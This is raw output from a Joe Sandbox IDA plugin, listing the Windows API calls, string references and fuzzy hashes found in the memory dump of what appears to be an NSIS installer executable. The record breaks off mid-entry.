                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                          • API String ID: 542301482-1377821865
                                                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                          • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                          • API String ID: 20674999-2124804629
                                                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                                          • DestroyWindow.USER32 ref: 004054E6
                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                          • EnableWindow.USER32(?,?), ref: 0040573C
                                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                          • String ID: @rD
                                                                          • API String ID: 184305955-3814967855
                                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                          APIs
                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                          • GetSysColor.USER32(?), ref: 004041AF
                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                          • SendMessageW.USER32(00000000), ref: 00404251
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                          • SetCursor.USER32(00000000), ref: 004042D2
                                                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                          • SetCursor.USER32(00000000), ref: 004042F6
                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                          • String ID: @%F$N$open
                                                                          • API String ID: 3928313111-3849437375
                                                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                          APIs
                                                                          • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                          • wsprintfA.USER32 ref: 00406B4D
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                          • String ID: F$%s=%s$NUL$[Rename]
                                                                          • API String ID: 565278875-1653569448
                                                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F
                                                                          • API String ID: 941294808-1304234792
APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
• WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
• WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
• WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
Similarity
• API ID: lstrlen$CloseCreateValuewvsprintf
• String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
• API String ID: 1641139501-220328614
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
• GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
• GlobalFree.KERNEL32(00000000), ref: 00402F17
• CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
• DeleteFileW.KERNEL32(?), ref: 00402F56
Strings
• created uninstaller: %d, "%s", xrefs: 00402F3B
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID: created uninstaller: %d, "%s"
• API String ID: 3294113728-3145124454
APIs
• CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
• GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
• WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
• lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
• WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
Similarity
• API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3734993849-2769509956
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
• GetSysColor.USER32(00000000), ref: 00403E00
• SetTextColor.GDI32(?,00000000), ref: 00403E0C
• SetBkMode.GDI32(?,?), ref: 00403E18
• GetSysColor.USER32(?), ref: 00403E2B
• SetBkColor.GDI32(?,?), ref: 00403E3B
• DeleteObject.GDI32(?), ref: 00403E55
• CreateBrushIndirect.GDI32(?), ref: 00403E5F
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
• Error registering DLL: %s not found in %s, xrefs: 0040249A
• Error registering DLL: Could not load %s, xrefs: 004024DB
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
• API String ID: 1033533793-945480824
APIs
• lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
• lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
• lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
• SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
Similarity
• API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
• String ID:
• API String ID: 2740478559-0
APIs
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: success ("%s"), xrefs: 00402263
• Exec: failed createprocess ("%s"), xrefs: 004022C2
• Exec: command="%s", xrefs: 00402241
                                                                          Similarity
                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                          • API String ID: 2014279497-3433828417
                                                                          • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                          • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                          • GetMessagePos.USER32 ref: 00404871
                                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                          • MulDiv.KERNEL32(0000F600,00000064,?), ref: 00403295
                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
